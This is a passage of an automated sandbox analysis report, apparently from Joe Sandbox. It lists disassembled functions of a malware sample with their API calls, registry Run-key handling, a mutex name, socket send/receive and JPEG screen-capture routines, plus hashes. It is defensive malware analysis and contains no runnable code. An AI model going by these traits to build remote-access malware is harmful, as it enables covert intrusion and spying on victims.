                                • Opcode ID: 83e50ac4dae1b8c5f58466140d22aecb7b5797b4a98a9f2a00060ccb3113e507
                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                • Opcode Fuzzy Hash: 83e50ac4dae1b8c5f58466140d22aecb7b5797b4a98a9f2a00060ccb3113e507
                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137A6
                                • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B869 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: hdF$pth_unenc
                                • API String ID: 3325800564-514923600
                                • Opcode ID: a0279363c5a25902ec7a11d25b89e924bfdaaad508c09a6524f83826895f7699
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: a0279363c5a25902ec7a11d25b89e924bfdaaad508c09a6524f83826895f7699
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,Pj,004752F0,?,pth_unenc), ref: 0040B8BB
                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: TerminateThread$HookUnhookWindows
                                • String ID: pth_unenc
                                • API String ID: 3123878439-4028850238
                                • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2579639479-0
                                • Opcode ID: ceb3114af3113f3e51a28b58c6f931136764174e6725d3240f6aeee7034d4dad
                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                • Opcode Fuzzy Hash: ceb3114af3113f3e51a28b58c6f931136764174e6725d3240f6aeee7034d4dad
                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041876F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                • GdiplusStartup.GDIPLUS(po,?,00000000,00000000), ref: 004187BF
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GdiplusStartupconnectsend
                                • String ID: NG$po
                                • API String ID: 1957403310-3896224581
                                • Opcode ID: 673274db020c139a2ecc853ca900501f0aefbfd7540e00b3ec92785fef0916f7
                                • Instruction ID: 7327f59b566e15a660d60aa82690027a46463592f46d402a66a7ce129b2a3f3c
                                • Opcode Fuzzy Hash: 673274db020c139a2ecc853ca900501f0aefbfd7540e00b3ec92785fef0916f7
                                • Instruction Fuzzy Hash: 7641A2717042015BC208FB22D952ABEB396ABC0358F50453FF54A672D2EF7C5D4A869E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                Download Yara Rule
                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/jpeg
                                • API String ID: 1291196975-3785015651
                                • Opcode ID: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                • Opcode Fuzzy Hash: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,Pj,004752F0,?,pth_unenc), ref: 00413A31
                                • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00413A45
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: Rmc-4QQORA
                                • API String ID: 1925916568-418441438
                                • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventObjectSingleWaitsend
                                • String ID:
                                • API String ID: 3963590051-0
                                • Opcode ID: 778a05176575217d70e804aa02ba2bb4ca6cce75f32be32a141a68c09f8a03c8
                                • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                • Opcode Fuzzy Hash: 778a05176575217d70e804aa02ba2bb4ca6cce75f32be32a141a68c09f8a03c8
                                • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                • RegCloseKey.KERNEL32(?), ref: 004135F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                • RegCloseKey.KERNEL32(?), ref: 00413592
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID:
                                • API String ID: 1818849710-0
                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventObjectSingleWaitrecv
                                • String ID:
                                • API String ID: 311754179-0
                                • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
